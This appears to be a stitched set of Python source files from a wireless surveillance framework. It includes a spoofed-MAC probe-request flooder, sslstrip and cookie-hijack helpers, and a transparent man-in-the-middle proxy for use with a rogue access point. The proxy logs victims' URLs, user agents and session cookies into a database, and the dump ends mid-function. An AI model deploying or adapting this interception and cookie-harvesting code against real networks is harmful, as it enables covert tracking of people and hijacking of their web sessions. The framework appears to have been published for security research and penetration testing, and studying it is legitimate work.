#!/usr/bin/python
from scapy.all import *
import time
import random
import binascii
import hashlib
import datetime
import sys
import monitor_mode 
import random

ssid="helloWorld"
f=open('log_traffic.txt','w')
rand_ssid = True

words=[]
if rand_ssid:
    f2=open('words.txt')
    words=f2.readlines()
    words = [x.rstrip() for x in words]

def rand_mac():
    return ':'.join(map(lambda x: "%02x" % x, [ 0x00, 0x16, 0x3E, random.randint(0x00, 0x7F), random.randint(0x00, 0xFF), random.randint(0x00, 0xFF) ]))

def generate_new_macs(num):
    """Generate random mac address list"""
    tmp_mac_addresses=[]
    for i in range(num):
        tmp_mac_addresses.append(rand_mac())
    return tmp_mac_addresses

def make_traffic(num_macs=10, run_time=30, cull=0.9,iface="mon0"):
        assert(num_macs > 0)
        assert(cull <= 1.0)
        assert(run_time > 0)
        mac_addresses = {}
        packet_counter = 0
        cycle_count = 0
        mac_counter = {}
        num_to_remove = int(cull * num_macs)
        print "[+] Good day, sir. I will send probe request traffic from %d unique MAC addresses cycling %d of them every %s" %(num_macs,num_to_remove,str(datetime.timedelta(seconds=run_time)))
        while True:            
            if mac_addresses:
                for i in range( num_to_remove ):
                    mac_addresses.pop()
                mac_addresses = mac_addresses + generate_new_macs(num_to_remove)
                #mac_counter += num_to_remove
            else:
                mac_addresses = generate_new_macs(num_macs)
            start_time = int(os.times()[4])
            current_time = start_time
            while start_time + run_time > current_time:
                random.shuffle(mac_addresses)
                for mac in mac_addresses:
                     mac_counter[mac] = 1
                     print "\r[+] Sent a total of %d packets from %d unique MAC addresses so far (cycled MACs %d times)" % (packet_counter, len(mac_counter), cycle_count),
                     sys.stdout.flush()
                     if rand_ssid:
                        rnd = random.randint(0,len(words)-1)
                        ssid = words[rnd]
                     p=RadioTap()/Dot11(addr1='ff:ff:ff:ff:ff:ff', addr3='ff:ff:ff:ff:ff:ff',addr2=mac)/Dot11ProbeReq() / Dot11Elt(ID='SSID', info=ssid) 
                     for i in range(random.randint(3,5)):
                          sendp(p, iface=iface, verbose=0)
                          packet_counter += 1
                current_time = int(os.times()[4])
                time.sleep(5)
            cycle_count+=1
            time.sleep(0.4)            

def main():
    iface = monitor_mode.enable_monitor_mode()        
    make_traffic(200, 2*60, 0.8,iface) #Generate N macs, traffic for 30 minutes, then generate new macs with 90% overlap

if __name__ == "__main__":
    main()



import os
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql.expression import Insert
from sqlalchemy import Column, String, MetaData, Integer
import hashlib
import glob

#Set path
snoopyPath=os.path.dirname(os.path.realpath(__file__))
os.chdir(snoopyPath)
os.chdir("..")

printFreq = 20

def get_plugin_names():
    return sorted([ os.path.basename(f)[:-3]
        for f in glob.glob("./plugins/*.py")
            if not os.path.basename(f).startswith('__') ])

def get_plugins():
    plugins = []
    for plug in get_plugin_names():
        plug = "plugins." + plug
        m = __import__(plug, fromlist="Snoop").Snoop
        plugins.append(m)
    return plugins

def get_tables():
    all_tables = []
    for plug in get_plugins():
        tbls = plug.get_tables()
        for tbl in tbls:
            tbl.append_column( Column('run_id', Integer) ) #Every entry generated gets the run id included. This is for joins, as well as tracking which drone created which data
            all_tables.append(tbl)
    return all_tables

def create_tables(db):
        tbls = get_tables()
        metadata = MetaData(db)
        for tbl in tbls:
            tbl.metadata = metadata
            if not db.dialect.has_table(db.connect(), tbl.name):
                tbl.create()

@compiles(Insert)
def replace_string(insert, compiler, **kw):
    s = compiler.visit_insert(insert, **kw)
    s = s.replace("INSERT INTO", "REPLACE INTO")
    return s

salt="50f51d9fdcb6066433431eb8c15214b7"
def snoop_hash(value):
    return hashlib.sha256(str(value)+salt).hexdigest() 



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# glenn@sensepost.com
import subprocess
from threading import Thread
import time
import sys
import os
import logging
from run_prog import run_program

if os.geteuid() != 0:
    exit("Please run me with root privilages")

DN = open(os.devnull, 'w')
logging.basicConfig(format='%(message)s', level=logging.DEBUG)

scriptPath=os.path.dirname(os.path.realpath(__file__))
#os.chdir(scriptPath)
sakis_exec=scriptPath + "/sakis3g"

class Sakis(Thread):
    """Uses the sakis3g binary to maintain a 3G connection. Supply APN"""
    def __init__(self,apn,bg = False):
        self.apn=apn
        self.dorun = True
        if not os.path.isfile(sakis_exec):
            logging.error("Error: 'sakis3g' binary is not in '%s' directory" % scriptPath)
            sys.exit(-1)
        Thread.__init__(self)
        self.start()

        if bg:
            logging.debug("[+] Starting backround 3G connection maintainer.")
        else:
            logging.debug("[+] Starting foreground 3G connection maintainer.")
            self.join()

    def run(self):
        self.maintain_connection()

    def maintain_connection(self):
        sawMessage, sawMessage2 = False, False
        while self.dorun:
            detected = self.is_plugged()
            while not detected and self.dorun:
                if not sawMessage2:
                    logging.info("No modem detected. Will check every 5 seconds until one apears, but won't show this message again.")
                    sawMessage2 = True
                time.sleep(5)
                detected = self.is_plugged()
            sawMessage2 = False
            if self.status() != "Connected" and detected and self.dorun:
                logging.info("Modem detected, but not currently online. Attempting to connect to 3G network '%s'" % self.apn)
                self.connect(self.apn)
                time.sleep(2)
                if self.status() == "Connected":
                    logging.info("Successfully connected to '%s'" % self.apn)
                    run_program("ntpdate ntp.ubuntu.com")
                else:
                    logging.info("Could not connect to '%s'. Will try again in 5 seconds" % self.apn)
            else:
                if not sawMessage:
                    logging.info("Modem is online.")
                    run_program("ntpdate ntp.ubuntu.com")
                    sawMessage = True
            time.sleep(5)
    
    def stop(self):
        logging.info("Stopping 3G connector. Will leave connection in its current state.")
        self.dorun = False

    @staticmethod
    def is_plugged():
        """Check if modem is plugged in"""
        try:
            r=subprocess.call([sakis_exec, "plugged"], stdout=DN, stderr=DN)
            if r == 0:
                return True
            else:
                return False
        except Exception,e:
            logging.error(e)
            return False
        

    @staticmethod
    def status():
        try:
            r=subprocess.call([sakis_exec, "status"], stdout=DN, stderr=DN)
            if r == 0:
                return "Connected"
            elif r == 6:
                return "Disconnected"
            else:
                return "Unknown"
        except Exception,e:
             logging.error(e)
             return "Error"

    @staticmethod
    def disconnect():
        r=subprocess.call([sakis_exec, "disconnect"], stdout=DN, stderr=DN)

    @staticmethod
    def get_apns():
        return "ToDo"

    @staticmethod
    def connect(apn):
        try:
            r=subprocess.call([sakis_exec, "connect", "APN='%s'"%apn], stdout=DN, stderr=DN)
            return r
        except Exception,e:
            logging.error(e)
            return -1

def usage():
    print "Usage:"
    print "\t%s <APN>"%__file__
    print "\te.g. %s orange.fr"%__file__

if __name__ == "__main__":
    if len(sys.argv) < 2:
        usage()
        sys.exit(-1)
    f=None
    try: 
        f=Sakis(sys.argv[1], False)
    except KeyboardInterrupt:
        logging.info("Caught Ctrl+C. Shutting down")
        f.stop()



#!/usr/bin/python 
#
# This might be horrible code...
# ...but it works
# Feel free to re-write in a better way
# And if you want to - send it to us, we'll update ;)
# maltego@paterva.com (2010/10/18)
#
import sys
from xml.dom import minidom

class MaltegoEntity(object):
	value = "";
	weight = 100;
	displayInformation = "";
	additionalFields = [];
	iconURL = "";
	entityType = "Phrase"
	
	def __init__(self,eT=None,v=None):
		if (eT is not None):
			self.entityType = eT;
		if (v is not None):
			self.value = v;
		self.additionalFields = None;
		self.additionalFields = [];
		self.weight = 100;
		self.displayInformation = "";
		self.iconURL = "";
		
	def setType(self,eT=None):
		if (eT is not None):
			self.entityType = eT;
	
	def setValue(self,eV=None):
		if (eV is not None):
			self.value = eV;
		
	def setWeight(self,w=None):
		if (w is not None):
			self.weight = w;
	
	def setDisplayInformation(self,di=None):
		if (di is not None):
			self.displayInformation = di;		
			
	def addAdditionalFields(self,fieldName=None,displayName=None,matchingRule=False,value=None):
		self.additionalFields.append([fieldName,displayName,matchingRule,value]);
	
	def setIconURL(self,iU=None):
		if (iU is not None):
			self.iconURL = iU;
			
	def returnEntity(self):
		print "<Entity Type=\"" + str(self.entityType) + "\">";
		print "<Value>" + str(self.value) + "</Value>";
		print "<Weight>" + str(self.weight) + "</Weight>";
		if (self.displayInformation is not None):
			print "<DisplayInformation><Label Name=\"\" Type=\"text/html\"><![CDATA[" + str(self.displayInformation) + "]]></Label></DisplayInformation>";
		if (len(self.additionalFields) > 0):
			print "<AdditionalFields>";
			for i in range(len(self.additionalFields)):
				if (str(self.additionalFields[i][2]) <> "strict"):
					print "<Field Name=\"" + str(self.additionalFields[i][0]) + "\" DisplayName=\"" + str(self.additionalFields[i][1]) + "\">" + str(self.additionalFields[i][3]) + "</Field>";
				else:
					print "<Field MatchingRule=\"" + str(self.additionalFields[i][2]) + "\" Name=\"" + str(self.additionalFields[i][0]) + "\" DisplayName=\"" + str(self.additionalFields[i][1]) + "\">" + str(self.additionalFields[i][3]) + "</Field>";
			print "</AdditionalFields>";
		if (len(self.iconURL) > 0):
			print "<IconURL>" + self.iconURL + "</IconURL>";
		print "</Entity>";
	





class MaltegoTransform(object):
	entities = []
	exceptions = []
	UIMessages = []
	
	#def __init__(self):
		#empty.
	
	def addEntity(self,enType,enValue):
		me = MaltegoEntity(enType,enValue);
		self.addEntityToMessage(me);
		return self.entities[len(self.entities)-1];
	
	def addEntityToMessage(self,maltegoEntity):
		self.entities.append(maltegoEntity);
		
	def addUIMessage(self,message,messageType="Inform"):
		self.UIMessages.append([messageType,message]);
	
	def addException(self,exceptionString):
		self.exceptions.append(exceptionString);
		
	def throwExceptions(self):
		print "<MaltegoMessage>";
		print "<MaltegoTransformExceptionMessage>";
		print "<Exceptions>"
		
		for i in range(len(self.exceptions)):
			print "<Exception>" + self.exceptions[i] + "</Exceptions>";
		print "</Exceptions>"	
		print "</MaltegoTransformExceptionMessage>";
		print "</MaltegoMessage>";
		
	def returnOutput(self):
		print "<MaltegoMessage>";
		print "<MaltegoTransformResponseMessage>";
						
		print "<Entities>"
		for i in range(len(self.entities)):
			self.entities[i].returnEntity();
		print "</Entities>"
						
		print "<UIMessages>"
		for i in range(len(self.UIMessages)):
			print "<UIMessage MessageType=\"" + self.UIMessages[i][0] + "\">" + self.UIMessages[i][1] + "</UIMessage>";
		print "</UIMessages>"
			
		print "</MaltegoTransformResponseMessage>";
		print "</MaltegoMessage>";
		
	def writeSTDERR(self,msg):
		sys.stderr.write(str(msg));
	
	def heartbeat(self):
		self.writeSTDERR("+");
	
	def progress(self,percent):
		self.writeSTDERR("%" + str(percent));
	
	def debug(self,msg):
		self.writeSTDERR("D:" + str(msg));
			






class MaltegoMsg:

 def __init__(self,MaltegoXML=""):

    xmldoc = minidom.parseString(MaltegoXML)
    
    #read the easy stuff like value, limits etc
    self.Value = self.i_getNodeValue(xmldoc,"Value")
    self.Weight = self.i_getNodeValue(xmldoc,"Weight")
    self.Slider = self.i_getNodeAttributeValue(xmldoc,"Limits","SoftLimit")
    self.Type = self.i_getNodeAttributeValue(xmldoc,"Entity","Type")
    
    
    #read additional fields
    AdditionalFields = {}
    try:
    	AFNodes= xmldoc.getElementsByTagName("AdditionalFields")[0]
    	Settings = AFNodes.getElementsByTagName("Field")
    	for node in Settings:
    		AFName = node.attributes["Name"].value;
    		AFValue = self.i_getText(node.childNodes);
    		AdditionalFields[AFName] = AFValue
    except:  
        #sure this is not the right way...;)
    	dontcare=1
     

    #parse transform settings
    TransformSettings = {}
    try:
    	TSNodes= xmldoc.getElementsByTagName("TransformFields")[0]
    	Settings = TSNodes.getElementsByTagName("Field")
    	for node in Settings:
    		TSName = node.attributes["Name"].value;
    		TSValue = self.i_getText(node.childNodes);
        	TransformSettings[TSName] = TSValue
    except:
    	dontcare=1  
                        
    #load back into object
    self.AdditionalFields = AdditionalFields
    self.TransformSettings = TransformSettings

 def i_getText(self,nodelist):
    rc = []
    for node in nodelist:
        if node.nodeType == node.TEXT_NODE:
            rc.append(node.data)
    return ''.join(rc)


 def i_getNodeValue(self,node,Tag):
    return self.i_getText(node.getElementsByTagName(Tag)[0].childNodes)

 def i_getNodeAttributeValue(self,node,Tag,Attribute):
    return node.getElementsByTagName(Tag)[0].attributes[Attribute].value;





from scapy.all import Dot11ProbeReq, Dot11Elt
import re
import logging

def prefilter(p):
    #Sometimes tcpdump returns garbled probe-request data. This is
    # a dirty hack to try and detect those cases
    if p.haslayer(Dot11ProbeReq):
        if not re.match("[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]", p.addr2):
            logging.debug("Bad MAC address detected: %s" % p.addr2)
            return False
        else:
            if p[Dot11Elt].info != '':
                ssid = p[Dot11Elt].info
                try:
                    ssid = ssid.decode('utf-8')
                except:
                    logging.debug("Bad SSID detected: %s" % ssid)
                    return False
                if len(ssid) == 0:
                    return False

    return True #Default operation



#!/usr/bin/env python

import os
from libmproxy import proxy, flow, platform
import datetime
import json
from threading import Thread
from collections import deque

class MyMaster(flow.FlowMaster):

    def run(self):
        self.logs = deque()
        try:
            flow.FlowMaster.run(self)
        except KeyboardInterrupt:
            self.shutdown()

    def handle_request(self, r):
        f = flow.FlowMaster.handle_request(self, r)
        if f:
            r.reply()

            client_ip = r.client_conn.address[0]
            host =  r.host
            path = r.path
            full_url = r.get_url()
            method = r.method
            port = r.port
            timestamp = r.timestamp_start
            useragent = r.headers.get('User-agent')
            if useragent:
                useragent = useragent[0]
            timestamp = datetime.datetime.fromtimestamp(r.timestamp_start)

            cookies = {}
            tmp_cookies = r.get_cookies()
            if tmp_cookies:
                for k, v in tmp_cookies.iteritems():
                    cookies[k] = v[0]
            cookies = json.dumps(cookies)

            log = {"client_ip":client_ip, "host":host, "path":path, "full_url":full_url, \
                    "method":method, "port":port, "timestamp":timestamp, "useragent":useragent, \
                    "cookies":cookies}
            self.logs.append(log)
        return f

    def get_logs(self):
        rtnData=[]
        while self.logs:
            rtnData.append(self.logs.popleft())
        return rtnData

    def handle_response(self, r):
        f = flow.FlowMaster.handle_response(self, r)
        if f:
            r.reply()
        return f

class myProx(Thread):
    def __init__(self):
        Thread.__init__(self)

        config = proxy.ProxyConfig(
            cacert = os.path.expanduser("~/.mitmproxy/mitmproxy-ca.pem"),
            transparent_proxy = dict (showhost=True,resolver = platform.resolver(), sslports = [443, 8443]) #Thanks nmonkee
        )
        state = flow.State()
        server = proxy.ProxyServer(config, 8080)
        self.m = MyMaster(server, state)

    def run(self):
        print "Running on 8080"
        self.m.run()
        print "Done"

    def get_data(self):
        return self.m.get_logs()



if __name__ == "__main__":
    p = myProx()
    p.run()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import time
import datetime
import collections
import logging
import os
from includes.fonts import *

def _newProxTest(ident):
    """Determine if a new session should be started. Should be overriden"""
    print "True!"
    return True

class prox:
    """Proximity session for arbitary observations."""

    def __init__(self,proxWindow=300, identName="ident", pulseName="numPulses", newProxFunc=_newProxTest, callerName='Unknown', verb=0):
        """
            proxWindow: sets the idletime before a new session is created
            newProxFunc: The function to test (beyond time) if a new session should be created
        """
        self.proxWindow = proxWindow
        self.currentProxSessions = {}
        self.closedProxSessions = collections.deque()
        self.mostRecentPulse = 0
        self.identName = identName #e.g. "mac", "hostname", etc
        self.pulseName = pulseName #e.g. num_probes, cookies, etc
        self.newProxFunc = newProxFunc
        self.callerName = callerName #For debug output
        self.verb = verb #Verbosity for debugging

    def pulse(self,ident, time=None):
        """ident is a variable that uniquely identifies a session. It
            can be a single value, or an array/tuple/etc"""
        if not time:
            time = datetime.datetime.now()
        self.mostRecentPulse = time

        # New session
        if ident not in self.currentProxSessions:
            self.currentProxSessions[ident] = [time, time, 1, 0]
            # Format is firstObser, lastObser, numPules, Sunc
            if self.verb > 1:
                logging.info("Sub-plugin %s%s%s observed new %s: %s%s%s" % (GR,self.callerName,G,self.identName,GR,ident,G))
        else:
            # Check if the session has expired
            firstObs = self.currentProxSessions[ident][0]
            lastObs = self.currentProxSessions[ident][1]
            numPulses = self.currentProxSessions[ident][2]
            if (time - lastObs).seconds >= self.proxWindow: #and self.newProxFunc(ident):
                self.closedProxSessions.append((ident, firstObs, lastObs, numPulses)) #Terminate old prox session
                self.currentProxSessions[ident] = [time, time, 1, 0] #Create new prox session
            else:
                self.currentProxSessions[ident][2] += 1     # Count number of pulses
                self.currentProxSessions[ident][1] = time
                self.currentProxSessions[ident][3] = 0 #Mark as require db sync

    def getNumProxs(self):
        return len(self.currentProxSessions) + len(self.closedProxSessions)

    def getProxs(self, timeStamp = None):
        """Return all proximity sessions that have not yet been reported. Calling this will
            empty local data structures. Use most recent pulse timestamp to determine expiration
            status, unless a time value is passed for time."""
        # First check if expired, if so, move to closed.
        # Use the most recent ident received as a timestamp.
        todel=[]
        data=[]
        if not timeStamp:
            t = self.mostRecentPulse
        else:
            t=timeStamp
        for ident,value in self.currentProxSessions.iteritems():
            firstObs=value[0]
            lastObs=value[1]
            numPulses=value[2]
            #t=self.mostRecentPulse
            if (t - lastObs).seconds >= self.proxWindow:
                self.closedProxSessions.append((ident,firstObs,t,numPulses))
                todel.append(ident)
        for ident in todel:
            del(self.currentProxSessions[ident])
        #1. Open Prox Sessions
        tmp_open_prox_sessions=[]
        for ident,value in self.currentProxSessions.iteritems():
            firstObs,lastObs,numPulses=value[0], value[1], value[2]
            #firstObs,lastObs = datetime.datetime.fromtimestamp(firstObs), datetime.datetime.fromtimestamp(lastObs)
            if value[3] == 0:
                tmp_open_prox_sessions.append({self.identName:ident,"first_obs":firstObs,"last_obs":lastObs,self.pulseName:numPulses})
        #2. Closed Prox Sessions
        tmp_closed_prox_sessions=[]
        for i in range(len(self.closedProxSessions)):
            ident, firstObs, lastObs, numPulses=self.closedProxSessions.popleft()
            #firstObs, lastObs = datetime.datetime.fromtimestamp(firstObs), datetime.datetime.fromtimestamp(lastObs)
            tmp_closed_prox_sessions.append( {self.identName:ident,"first_obs":firstObs,"last_obs":lastObs,self.pulseName:numPulses})#, "drone":self.drone, "location":self.location} )
        if( len(tmp_open_prox_sessions+tmp_closed_prox_sessions) > 0 ):
            #Set flag to indicate data has been fetched:
            for i in tmp_open_prox_sessions:
                ident=i[self.identName]
                self.currentProxSessions[ident][3]=1 #Mark it has having been retrieved, so we don't resend until it changes

            proxSess = tmp_open_prox_sessions+tmp_closed_prox_sessions
            return proxSess



# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
from twisted.internet.protocol import ClientFactory

class ServerConnectionFactory(ClientFactory):

    def __init__(self, command, uri, postData, headers, client):
        self.command      = command
        self.uri          = uri
        self.postData     = postData
        self.headers      = headers
        self.client       = client

    def buildProtocol(self, addr):
        return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
    
    def clientConnectionFailed(self, connector, reason):
        logging.debug("Client:%s Server connection failed." % (self.client.getClientIP()))

        destination = connector.getDestination()

        if (destination.port != 443):
            logging.debug("Client:%s Retrying via SSL" % (self.client.getClientIP()))
            self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
        else:
            self.client.finish()




#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
import sys
import requests
import re
import logging
from urlparse import urlparse

#Set path
path = os.path.dirname(os.path.realpath(__file__))
manuf_url = "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=blob_plain;f=manuf;hb=HEAD"

class mac_vendor():
    def __init__(self):
        self.mac_lookup = {}
        with open("%s/mac_vendor.txt" % path) as f:
            for line in f:
                line = line.strip()
                (mac, vendorshort, vendorlong) = line.split("|")
                self.mac_lookup[mac.lower()] = (vendorshort, vendorlong)

    def lookup(self, mac):
        mac = mac.lower()
        if mac in self.mac_lookup:
            return self.mac_lookup[mac]
        else:
            return ("Unknown", "Unknown device")

    def update(self, url=None):
        if not url:
            url = manuf_url
        o = urlparse(url)
        logging.debug("Fetching data from %s..." % url)
        if not o.scheme or o.scheme == "file":
            with open(url, "r") as f:
                data = f.read()
        elif o.scheme == "http" or o.scheme == "https":
            r = requests.get(url)
            data = r.text.encode("utf8")
        else:
            logging.error("Only local files or http(s) URLs are supported")
            return None

        count = 0
        f = open("%s/mac_vendor.txt" % path, "a")
        for line in data.split('\n'):
            try:
                mac, vendor = re.search(r'([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\t(.*)', line).groups()
                mac = mac.replace(":", "").lower()
                vendor = vendor.split("# ")
                vendorshort = vendor[0].strip()
                vendorlong = vendorshort
                if (len(vendor) == 2):
                    vendorlong = vendor[1].strip()
                if mac in self.mac_lookup:
                    continue
                f.write("|".join((mac.upper(), vendorshort, vendorlong + "\n")))
                self.mac_lookup[mac] = (vendorshort, vendorlong)
                count += 1
            except AttributeError:
                continue
            except:
                logging.error("Processing error - you may need to restore mac_vendor.txt manually.")
                return None

        f.close()
        logging.debug("Wrote %d new MAC vendor entries" % count)


if __name__ == "__main__":
    import argparse

    logging.basicConfig(level=logging.DEBUG,
        format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S')

    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--update", help="Update OUI data from a text file in Wireshark manuf format", action='store_true')
    parser.add_argument("-f", "--file", help="The location of the Wireshark manuf file (useful if available locally)")
    args = parser.parse_args()

    if not args.update:
        print "[!] No operation specified! Try --help."
        sys.exit(-1)

    mv = mac_vendor()
    mv.update(args.file)






#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import sqlalchemy as sa
from threading import Thread
import time
import includes.system_info as sysinfo
import os
from includes.fonts import *
import datetime
#logging.basicConfig(level=logging.DEBUG)

class Snoop(Thread):
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.last_heartbeat = 0
        #self.heartbeat_freq = 60*30 # Check system every n seconds
        self.system_statuses = []

        self.verb = kwargs.get('verbose', 0)
        self.heartbeat_freq = int(kwargs.get('freq', 60*30))
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

    def is_ready(self):
        """Indicates the module is ready, and loading of next module may commence."""
        return True

    def stop(self):
        """Perform operations required to stop module and return"""
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        """List of paramters that can be passed to the module, for user help output."""
        info = {"info" : "Retrieves system information, every 30 minutes.",
                "parameter_list" : None
                }
        return info

    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        tmp_to_return = self.system_statuses 
        self.system_statuses = []
        return tmp_to_return

    def run(self):
        logging.info("Plugin %s%s%s will check device status every %s%d%s seconds." % (GR,self.fname,G, GR,self.heartbeat_freq,G))
        while self.RUN:
            #now = int(time.time())
            now = int(os.times()[4])
            if abs(now - self.last_heartbeat) > self.heartbeat_freq:
                logging.debug("Checking system status")
                self.last_heartbeat = now
                global_stats = sysinfo.query_system_status()
                busy_pids = sysinfo.fetch_busy_processes() 
             
                timeStamp = datetime.datetime.now()
                #global_stats['drone'] = self.drone
                global_stats['timestamp'] = timeStamp #int(time.time())
    
                for pid in busy_pids:
                    #pid['drone'] = self.drone
                    pid['timestamp'] = timeStamp #now
   
                if self.verb > 0:
                    logging.info("Plugin %s%s%s generated new data." % (GR,self.fname,G))

                if global_stats: 
                    self.system_statuses.append( ('sys_global',[global_stats]) )
                if busy_pids:
                    self.system_statuses.append( ('sys_bpids', busy_pids) )
            time.sleep(2)

    @staticmethod
    def get_tables():
        """Return the table definitions for this module."""
        # Make sure to define your table here. Ensure you have a 'sunc' column:
        metadata = sa.MetaData()
        table_global = sa.Table('sys_global',metadata,
                              #sa.Column('drone', sa.String(length=20), primary_key=True),
                              sa.Column('timestamp', sa.DateTime, primary_key=True, autoincrement=False),
                              sa.Column('network_rcvd',sa.Float() ),
                              sa.Column('network_sent',sa.Float() ),
                              sa.Column('uptime',sa.String(15)),
                              sa.Column('used_cpu',sa.Float() ),
                              sa.Column('used_disk',sa.Float() ),
                              sa.Column('used_mem',sa.Float() ),
                              sa.Column('sunc', sa.Integer, default=0))

        table_bpids = sa.Table('sys_bpids',metadata,
                              #sa.Column('drone', sa.String(length=20), primary_key=True),
                              sa.Column('timestamp', sa.Integer, primary_key=True, autoincrement=False),
                              sa.Column('cpu',sa.Float() ),
                              sa.Column('mem',sa.Float() ),
                              sa.Column('name',sa.String(length=20) ),
                              sa.Column('pid',sa.Integer ),
                              sa.Column('sunc', sa.Integer, default=0))

        return [table_global,table_bpids]


if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
from sqlalchemy import Float, DateTime, String, Integer, Table, MetaData, Column #As required
from threading import Thread
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')
import time
from collections import deque
from random import randint
import datetime
from threading import Thread
import os
from includes.fonts import *
from includes.mitm import *


class Snoop(Thread):
    """This plugin starts a proxy server."""
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.data_store = deque(maxlen=1000)

        # Process arguments passed to module
        self.port = int(kwargs.get('port', 8080))
        self.transparent = kwargs.get('transparent', 'false').lower()
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        config = proxy.ProxyConfig(
            cacert = os.path.expanduser("~/.mitmproxy/mitmproxy-ca.pem"),
            transparent_proxy = dict (showhost=True, resolver = platform.resolver(), sslports = [443, 8443])
        )


        state = flow.State()
        server = proxy.ProxyServer(config, self.port)
        self.m = MyMaster(server, state)


    def run(self):
        logging.info("Plugin %s%s%s started proxy on port %s%s%s" % (GR,self.fname,G,GR,self.port,G))
        self.m.run()

    def is_ready(self):
        #Perform any functions that must complete before plugin runs
        return True

    def stop(self):
        self.m.shutdown()

    @staticmethod
    def get_parameter_list():
        info = {"info" : "This plugin runs a proxy server. It's useful in conjunction with iptables and rogueAP",
                "parameter_list" : [ ("port=<port>","Port for proxy to listen on."),
                                     ("upprox=<ip:port>","Upstream proxy to use."),
                                     ("transparent=[True|False]","Set transparent mode. Default is False")
                                    ] 
                }
        return info


    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        #e.g of return data - [("tbl_name", [{'var01':99, 'var02':199}]
        data = self.m.get_logs()
        toReturn = []
        if data:
            for d in data:
                toReturn.append(d)
            return [("web_logs", toReturn)] 
        else:
            return []


    @staticmethod
    def get_tables():
        """This function should return a list of table(s)"""

        table = Table('web_logs',MetaData(),
                              Column('client_ip', String(length=15)),
                              Column('host', String(length=40)),
                              Column('path', String(length=20)),
                              Column('full_url', String(length=20)),
                              Column('method', String(length=20)),
                              Column('port', String(length=20)),
                              Column('timestamp', String(length=20)),
                              Column('useragent', String(length=20)),
                              Column('cookies', String(length=20)),        
                              Column('sunc', Integer, default=0)
                    )

        #TODO: Need to pull MAC address out with mitm to incorporate below.
        table2 = Table('user_agents', MetaData(),
                        Column('mac', String(64), primary_key=True), #Len 64 for sha256
                        Column('userAgent', String(128), primary_key=True, autoincrement=False)) #One device may have multiple browsers

        return [table]

if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/env python
# copyright of sandro gauci 2008
# hijack helper functions
def parseHeader(buff,type='response'):
    import re
    SEP = '\r\n\r\n'
    HeadersSEP = '\r*\n(?![\t\x20])'
    import logging
    log = logging.getLogger('parseHeader')
    if SEP in buff:
        header,body = buff.split(SEP,1)
    else:
        header = buff
        body = ''
    headerlines = re.split(HeadersSEP, header)
    
    if len(headerlines) > 1:
        r = dict()
        if type == 'response':
            _t = headerlines[0].split(' ',2)
            if len(_t) == 3:
                httpversion,_code,description = _t
            else:
#                log.warn('Could not parse the first header line: %s' % `_t`)
                return r
            try:
                r['code'] = int(_code)
            except ValueError:
                return r
        elif type == 'request':
            _t = headerlines[0].split(' ',2)
            if len(_t) == 3:
                method,uri,httpversion = _t
                r['method'] = method
                r['uri'] = uri
                r['httpversion'] = httpversion
        else:
#            log.warn('Could not parse the first header line: %s' % `_t`)
            return r  
        r['headers'] = dict()
        for headerline in headerlines[1:]:
            SEP = ':'
            if SEP in headerline:
                tmpname,tmpval = headerline.split(SEP,1)
                name = tmpname.lower().strip()
                val =  map(lambda x: x.strip(),tmpval.split(','))
            else:
                name,val = headerline.lower(),None
            r['headers'][name] = val
        r['body'] = body
        return r

def getdsturl(tcpdata):
        import logging
        log = logging.getLogger('getdsturl')
        p = parseHeader(tcpdata,type='request')
        if p is None:
#                log.warn('parseHeader returned None')
                return
        if p.has_key('uri') and p.has_key('headers'):
            if p['headers'].has_key('host'):
                r = 'http://%s%s' % (p['headers']['host'][0],p['uri'])
                return r
            #else:
#                log.warn('seems like no host header was set')
        #else:
#                log.warn('parseHeader did not give us a nice return %s' % p)

def gethost(tcpdata):
    import logging
    log = logging.getLogger('getdsturl')
    p = parseHeader(tcpdata,type='request')
    if p is None:
#            log.warn('parseHeader returned None')
            return
    if p.has_key('headers'):
        if p['headers'].has_key('host'):
            return p['headers']['host']

def getuseragent(tcpdata):
    import logging
    log = logging.getLogger('getuseragent')
    p = parseHeader(tcpdata,type='request')
    if p is None:
#            log.warn('parseHeader returned None')
            return
    if p.has_key('headers'):
        if p['headers'].has_key('user-agent'):
            return p['headers']['user-agent']
        
def calcloglevel(options):
    logginglevel = 30
    if options.verbose is not None:
        if options.verbose >= 3:
            logginglevel = 10
        else:
            logginglevel = 30-(options.verbose*10)
    if options.quiet:
        logginglevel = 50
    return logginglevel

def getcookie(tcpdata):
    p = parseHeader(tcpdata,type='request')
    if p is None:
        return
    if p.has_key('headers'):
